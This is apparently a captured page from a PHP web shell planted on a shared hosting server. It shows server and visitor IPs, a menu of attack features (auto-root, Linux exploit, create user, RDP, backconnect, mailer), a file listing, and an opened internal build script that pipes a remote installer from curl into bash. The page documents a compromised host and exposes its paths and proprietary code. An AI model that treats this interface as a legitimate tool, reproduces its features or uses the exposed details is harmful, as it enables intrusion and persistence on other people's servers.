Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
bin /
dhwp /
[ HOME SHELL ]
Name
Size
Permission
Action
.idea
[ DIR ]
drwxrwxr-x
config
[ DIR ]
drwxr-xr-x
dhwp
[ DIR ]
drwxr-xr-x
dhwp.egg-info
[ DIR ]
drwxr-xr-x
docker
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
env
[ DIR ]
drwxr-xr-x
etc
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.gitlab-ci.yml
197
B
-rw-rw-r--
.pycodestyle
36
B
-rw-rw-r--
CHANGELOG.md
51
B
-rw-rw-r--
Dockerfile
1.25
KB
-rw-rw-r--
Dockerfile.wordpress
222
B
-rw-rw-r--
LICENSE.md
1
B
-rw-rw-r--
MANIFEST.in
132
B
-rw-rw-r--
Makefile
731
B
-rw-rw-r--
README.md
3.49
KB
-rw-rw-r--
batch-config.yaml
300
B
-rw-rw-r--
build-dhwp-package.sh
1.4
KB
-rw-rw-r--
dhwp-exec.sh
44
B
-rwxrwxr-x
dhwp-init.sh
1.08
KB
-rwxrwxr-x
dhwp-shell.sh
59
B
-rwxrwxr-x
docker-compose.yml
1.57
KB
-rw-rw-r--
license.txt
19.47
KB
-rw-rw-r--
plugins.yaml
300
B
-rw-rw-r--
requirements-dev.txt
116
B
-rw-rw-r--
requirements.txt
58
B
-rw-rw-r--
setup.cfg
0
B
-rw-rw-r--
setup.py
725
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : build-dhwp-package.sh
#!/bin/bash -xe VERSION=$1 GIT_SSH_COMMAND='ssh -i ~/.ssh/git_key -o IdentitiesOnly=yes' git clone git@git.dreamhost.com:dreamhost/dhwp.git rm -rf dhwp/.git dhwp/.gitignore \curl -sSL https://get.rvm.io | bash -s stable source ~/.rvm/scripts/rvm # following line commented out as gem should be already installed, with sudo perms. If you're doing it on some host # without gem - try to install it with `` if you have permissions, or maybe even try to uncomment ^ line #gem install --no-document fpm mkdir -p etc/profile.d echo "alias dhwpenv='source /usr/local/bin/dhwp/env/bin/activate'" > etc/profile.d/dhwp.sh mkdir -p usr/local/bin/ mv dhwp usr/local/bin/ echo -e "#!/usr/bin/env bash\nset -e\ncd /usr/local/bin/dhwp\nvirtualenv -p python3 --prompt '|> dhwp <| ' env >/dev/null 2>&1\nenv/bin/pip install -r requirements.txt >/dev/null 2>&1\nenv/bin/python setup.py develop >/dev/null 2>&1\nln -s /usr/local/bin/dhwp/env/bin/dhwp /usr/bin/dhwp >/dev/null 2>&1\n" > dhwp_postinst.sh echo -e "#!/usr/bin/env bash\nset -e\nif [ -e /usr/local/bin/dhwp ]; then\n\trm -f /usr/bin/dhwp\n\trm -rf /usr/local/bin/dhwp/dhwp.egg-info\n\trm -rf /usr/local/bin/dhwp/env\n\tif which py3clean >/dev/null 2>&1; then\n\t\tpy3clean /usr/local/bin/dhwp\n\tfi\nfi" > dhwp_prerm.sh fpm -t deb -s dir --before-remove dhwp_prerm.sh --after-install dhwp_postinst.sh --depends "virtualenv" --deb-pre-depends "virtualenv" -v "${VERSION}" -n dhwp usr/ etc/
Close